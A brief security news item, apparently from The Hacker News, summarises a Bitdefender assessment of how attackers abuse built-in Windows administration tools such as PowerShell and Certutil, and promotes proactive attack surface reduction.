The Hidden Danger of Trusted Utilities
A 45 day internal attack surface assessment by Bitdefender has revealed a stark reality for enterprise security. The most dangerous activity inside most organizations no longer looks like a traditional attack. It looks like routine IT administration. PowerShell, WMIC, netsh, and Certutil, the same utilities that IT teams use every day, are also the preferred toolkit of modern threat actors. Bitdefender’s analysis of 700,000 high severity incidents found legitimate tool abuse in 84% of cases. A clean Windows 11 install ships with 133 unique living off the land binaries spread across 987 instances. PowerShell remains active on 73% of endpoints, much of it invoked silently by third party applications. This is not a malware problem. It is an over entitlement problem that cannot be patched away.
Impact and Scope of the Assessment
The assessment runs over roughly 45 days using Bitdefender’s GravityZone PHASR technology for proactive hardening and attack surface reduction. It begins with a kickoff and behavioral learning phase, then produces a specific prioritized list of users, endpoints, and tools that can be safely taken away from attackers without breaking business operations. Gartner now projects that preemptive cybersecurity will account for 50% of IT security spending by 2030, up from less than 5% in 2024. The firm also predicts that 60% of large enterprises will adopt dynamic attack surface reduction technologies by 2030, up from less than 10% in 2025. The core insight is mechanical. When most intrusions involve no malware and adversaries move in minutes, a detect and respond approach is too slow. Organizations must remove the moves attackers can make in the first place.
Source: The Hacker News
